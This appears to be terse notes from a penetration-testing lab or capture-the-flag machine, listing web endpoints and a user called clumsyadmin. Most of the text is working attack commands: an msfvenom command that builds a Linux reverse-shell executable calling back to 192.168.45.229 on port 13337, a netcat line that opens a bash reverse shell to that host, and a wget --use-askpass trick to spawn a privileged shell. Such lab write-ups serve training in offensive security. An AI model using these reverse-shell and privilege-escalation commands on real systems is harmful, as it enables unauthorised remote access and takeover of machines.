13337

/version
/update
/logs
/restart

We have a user called clumsyadmin

We can create an ELF reverse shell executeable:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.45.229 LPORT=13337 -f elf > shell

Now start a python server:

python3 -m uploadserver 80
nc 192.168.45.229 13337 -e /bin/bash
TF=$(mktemp)
chmod +x $TF
echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TF
wget --use-askpass=$TF 0

Last updated